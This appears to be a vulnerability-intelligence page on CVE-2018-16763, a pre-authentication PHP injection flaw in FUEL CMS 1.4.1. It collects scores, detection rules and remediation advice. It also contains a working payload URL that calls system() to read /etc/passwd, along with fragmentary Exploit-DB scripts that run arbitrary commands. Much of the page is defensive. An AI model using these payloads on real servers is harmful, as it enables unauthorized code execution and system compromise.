CVE-2018-16763
published 2018-09-09CVE-2018-16763: FUEL CMS 1.4.1 allows PHP Code Evaluation via the pages/select/ filter parameter or the preview/ data parameter. This can lead to Pre-Auth Remote Code…
PriorityP191critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
82.94%
99.6th percentile
FUEL CMS 1.4.1 allows PHP Code Evaluation via the pages/select/ filter parameter or the preview/ data parameter. This can lead to Pre-Auth Remote Code Execution.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| thedaylightstudio | fuel_cms | <= 1.4.2 | — |
Detection & IOCsextracted from sources · hover to see the quote
url/fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27↗
url/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27↗
snort
alert http any any -> [$HTTP_SERVERS,$HOME_NET] any (msg:"ET EXPLOIT Fuel CMS 1.4.1 RCE (CVE-2018-16763)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/fuel/pages/select/"; fast_pattern; content:"filter=|27 2b|"; content:"|2b 27|"; distance:0; reference:url,github.com/daylightstudio/FUEL-CMS/issues/478; reference:url,cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers; reference:cve,2018-16763; classtype:attempted-admin; sid:2036748; rev:2; metadata:attack_target Server, created_at 2022_06_02, cve CVE_2018_16763, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, updated_at 2024_06_23, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
bytes
filter=|27 2b| ... |2b 27|
- →Exploit targets GET requests to /fuel/pages/select/ with a `filter` parameter containing URL-encoded PHP code injection using pi(print(...)) pattern. Look for `filter=` followed by percent-encoded single-quotes and `pi(` or `system` strings. ↗
- →The attack is Pre-Auth (no authentication required). Any GET to /fuel/pages/select/?filter= with encoded PHP eval payload should be treated as an exploitation attempt regardless of session state. ↗
- →Shodan/FOFA fingerprinting queries used by attackers to discover targets: search for HTTP title 'fuel cms' or page title 'fuel cms'.
- →The exploit also abuses the preview/ data parameter as an alternative injection point. Monitor POST/GET requests to /fuel/preview/ with a `data` parameter containing PHP code.
- →Exploit traffic uses a local proxy on 127.0.0.1:8080 in some variants; however the key network indicator is the URI pattern, not the proxy. ↗
- ·The Nuclei template uses a benign test command (cat /etc/passwd) and matches on 'root:.*:0:0:' in the response to confirm RCE. Production detection rules should not rely solely on response content matching, as attackers will use different commands.
- ·The Snort rule (ET sid:2036748 rev:2) matches on the URL-encoded single-quote byte sequence |27 2b| in the filter parameter. Attackers may vary encoding (e.g., double-encoding or alternate representations) to evade this specific byte pattern.
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-rq3x-g9v8-6qjm: FUEL CMS 1
ghsa_unreviewed·2022-05-13
CVE-2018-16763 [CRITICAL] CWE-74 GHSA-rq3x-g9v8-6qjm: FUEL CMS 1
FUEL CMS 1.4.1 allows PHP Code Evaluation via the pages/select/ filter parameter or the preview/ data parameter. This can lead to Pre-Auth Remote Code Execution.
VulnCheck
thedaylightstudio Fuel CMS Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
vulncheck·2018·CVSS 9.8
CVE-2018-16763 [CRITICAL] thedaylightstudio Fuel CMS Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
thedaylightstudio Fuel CMS Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
FUEL CMS 1.4.1 allows PHP Code Evaluation via the pages/select/ filter parameter or the preview/ data parameter. This can lead to Pre-Auth Remote Code Execution.
Affected: thedaylightstudio Fuel CMS
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-13&host_type=src&vulnerability=cve-2018-16763; https://dashboard.sh
Suricata
ET EXPLOIT Fuel CMS 1.4.1 RCE (CVE-2018-16763)
suricata·2022-06-02·CVSS 9.8
CVE-2018-16763 [CRITICAL] ET EXPLOIT Fuel CMS 1.4.1 RCE (CVE-2018-16763)
ET EXPLOIT Fuel CMS 1.4.1 RCE (CVE-2018-16763)
Rule: alert http any any -> [$HTTP_SERVERS,$HOME_NET] any (msg:"ET EXPLOIT Fuel CMS 1.4.1 RCE (CVE-2018-16763)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/fuel/pages/select/"; fast_pattern; content:"filter=|27 2b|"; content:"|2b 27|"; distance:0; reference:url,github.com/daylightstudio/FUEL-CMS/issues/478; reference:url,cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers; reference:cve,2018-16763; classtype:attempted-admin; sid:2036748; rev:2; metadata:attack_target Server, created_at 2022_06_02, cve CVE_2018_16763, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, updated_at 2024_06_23
Exploit-DB
Fuel CMS 1.4.1 - Remote Code Execution (3)
exploitdb·2021-11-03·CVSS 9.8
CVE-2018-16763 [CRITICAL] Fuel CMS 1.4.1 - Remote Code Execution (3)
Fuel CMS 1.4.1 - Remote Code Execution (3)
---
# Exploit Title: Fuel CMS 1.4.1 - Remote Code Execution (3)
# Exploit Author: Padsala Trushal
# Date: 2021-11-03
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: ',epilog=f'EXAMPLE - python3 {sys.argv[0]} -u http://10.10.21.74')
parser.add_argument('-v','--version',action='version',version='1.2',help='show the version of exploit')
parser.add_argument('-u','--url',metavar='url',dest='url',help='Enter the url')
args = parser.parse_args()
if len(sys.argv)
output = r.text.split('')
print(output[0])
if cmd == "exit":
break
Exploit-DB
Fuel CMS 1.4.1 - Remote Code Execution (2)
exploitdb·2021-01-28·CVSS 9.8
CVE-2018-16763 [CRITICAL] Fuel CMS 1.4.1 - Remote Code Execution (2)
Fuel CMS 1.4.1 - Remote Code Execution (2)
---
# Title: Fuel CMS 1.4.1 - Remote Code Execution (2)
# Exploit Author: Alexandre ZANNI
# Date: 2020-11-14
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version:
#{__FILE__} -h | --help
Options:
Root URL (base path) including HTTP scheme, port and root folder
The system command to execute
-h, --help Show this screen
Examples:
#{__FILE__} http://example.org id
#{__FILE__} https://example.org:8443/fuelcms 'cat /etc/passwd'
DOCOPT
def exploit(client, root_url, cmd)
url = root_url + "/fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('#{cmd}')%2B'"
res = client.get(url)
/system(.+?)'], args[''])
rescue Docopt::Exit => e
puts e.message
end
Exploit-DB
fuel CMS 1.4.1 - Remote Code Execution (1)
exploitdb·2019-07-19·CVSS 9.8
CVE-2018-16763 [CRITICAL] fuel CMS 1.4.1 - Remote Code Execution (1)
fuel CMS 1.4.1 - Remote Code Execution (1)
---
# Exploit Title: fuel CMS 1.4.1 - Remote Code Execution (1)
# Date: 2019-07-19
# Exploit Author: 0xd0ff9
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: = 0 and n > 1:
start = haystack.find(needle, start+1)
n -= 1
return start
while 1:
xxxx = raw_input('cmd:')
burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"
proxy = {"http":"http://127.0.0.1:8080"}
r = requests.get(burp0_url, proxies=proxy)
html = ""
htmlcharset = r.text.find(html)
begin = r.text[0:20]
dup = find_nth_overlapping(r.text,begin,2)
print r.text[0:dup]
Nuclei
FUEL CMS 1.4.1 - Remote Code Execution
nuclei·CVSS 9.8
CVE-2018-16763 [CRITICAL] FUEL CMS 1.4.1 - Remote Code Execution
FUEL CMS 1.4.1 - Remote Code Execution
FUEL CMS 1.4.1 allows PHP Code Evaluation via the pages/select/ filter parameter or the preview/ data parameter.
Template:
id: CVE-2018-16763
info:
name: FUEL CMS 1.4.1 - Remote Code Execution
author: pikpikcu
severity: critical
description: FUEL CMS 1.4.1 allows PHP Code Evaluation via the pages/select/ filter parameter or the preview/ data parameter.
impact: |
Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system, leading to complete compromise of the application and potentially the underlying server.
remediation: |
Upgrade to FUEL CMS version 1.4.2 or later, which includes a patch for this vulnerability.
reference:
- https://www.exploit-db.com/exploits/47138
- https://www.getfuelcms.com/
http://packetstormsecurity.com/files/153696/fuelCMS-1.4.1-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/160080/Fuel-CMS-1.4-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/164756/Fuel-CMS-1.4.1-Remote-Code-Execution.htmlhttps://0xd0ff9.wordpress.com/2019/07/19/from-code-evaluation-to-pre-auth-remote-code-execution-cve-2018-16763-bypass/https://github.com/daylightstudio/FUEL-CMS/issues/478https://www.exploit-db.com/exploits/47138http://packetstormsecurity.com/files/153696/fuelCMS-1.4.1-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/160080/Fuel-CMS-1.4-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/164756/Fuel-CMS-1.4.1-Remote-Code-Execution.htmlhttps://0xd0ff9.wordpress.com/2019/07/19/from-code-evaluation-to-pre-auth-remote-code-execution-cve-2018-16763-bypass/https://github.com/daylightstudio/FUEL-CMS/issues/478https://www.exploit-db.com/exploits/47138
2018-09-09
Published
Exploited in the wild